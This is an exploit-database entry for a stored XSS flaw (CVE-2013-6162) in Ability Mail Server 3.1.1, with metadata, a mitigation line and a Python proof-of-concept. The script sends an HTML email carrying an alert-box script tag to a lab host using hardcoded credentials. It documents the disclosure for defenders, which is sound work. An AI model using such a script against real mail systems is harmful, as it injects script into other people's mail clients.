header-logo
Suggest Exploit
vendor:
Ability Mail Server
by:
David Um
7,5
CVSS
HIGH
Stored XSS
79
CWE
Product Name: Ability Mail Server
Affected Version From: 3.1.1
Affected Version To: 3.1.1
Patch Exists: NO
Related CWE: CVE-2013-6162
CPE: a:code-crafters:ability_mail_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows Server 2003 SP2
2013

Ability Mail Server 2013 Stored XSS

This proof of concept demonstrates a stored XSS vulnerability in e-mail clients when JavaScript is inserted into the body of an e-mail.

Mitigation:

Disable JavaScript in e-mail clients, or filter out JavaScript from incoming e-mails.
Source

Exploit-DB raw data:

#!/usr/bin/env python

'''
Exploit Title: Ability Mail Server 2013 Stored XSS
Date: 12/20/2013
Exploit Author: David Um
Vendor Homepage: http://www.code-crafters.com/
Software Link: http://download.code-crafters.com/ams.exe
Version: 3.1.1
Tested on: Windows Server 2003 SP2
CVE : CVE-2013-6162
Description: This proof of concept demonstrates a stored XSS vulnerability in e-mail clients when JavaScript is inserted into the body of an e-mail.
'''

import smtplib

email_addr = 'user@hack.local'

email = 'From: %s\n' % email_addr
email += 'To: %s\n' % email_addr
email += 'Subject: XSS\n'
email += 'Content-type: text/html\n\n'
email += '<script>alert("XSS")</script>'
s = smtplib.SMTP('192.168.58.140', 25)

s.login(email_addr, "user")
s.sendmail(email_addr, email_addr, email)
s.quit()